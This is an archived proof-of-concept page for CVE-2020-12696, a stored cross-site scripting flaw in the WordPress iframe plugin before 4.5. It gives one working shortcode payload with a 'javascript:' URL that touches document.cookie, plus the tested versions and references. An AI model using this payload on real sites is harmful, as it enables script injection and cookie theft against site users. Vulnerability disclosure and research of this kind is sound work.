Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-12696 PoC — WordPress iframe 跨站脚本漏洞

Source
https://github.com/g-rubert/CVE-2020-12696
Associated Vulnerability
Title:WordPress iframe 跨站脚本漏洞 (CVE-2020-12696)
Description:The iframe plugin before 4.5 for WordPress does not sanitize a URL.
Description
Stored Cross Site Scripting - Iframe Plugin - WordPress
Readme
# CVE-2020-12696

```
██╗  ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
 ╚███╔╝ ███████╗███████╗
 ██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝  ╚═╝╚══════╝╚══════╝
```  

**Iframe < 4.5 - Authenticated Stored Cross Site Scripting (XSS)**

The iframe plugin before 4.5 does not sanitize a URL.

    Payload: </b>[iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]
    Version [plugin]: </b>4.4
    Tested on: </b>WordPress 5.2.4
    Researcher:</b> Guilherme Rubert

<br>

**References:**

https://guilhermerubert.com/blog/cve-2020-12696/
<br>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12696
<br>https://wordpress.org/plugins/iframe/#developers
File Snapshot

 [4.0K]  /data/pocs/a7be3070bfc4ecbba28688b7ded68067b4e0ea0c
└── [ 964]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →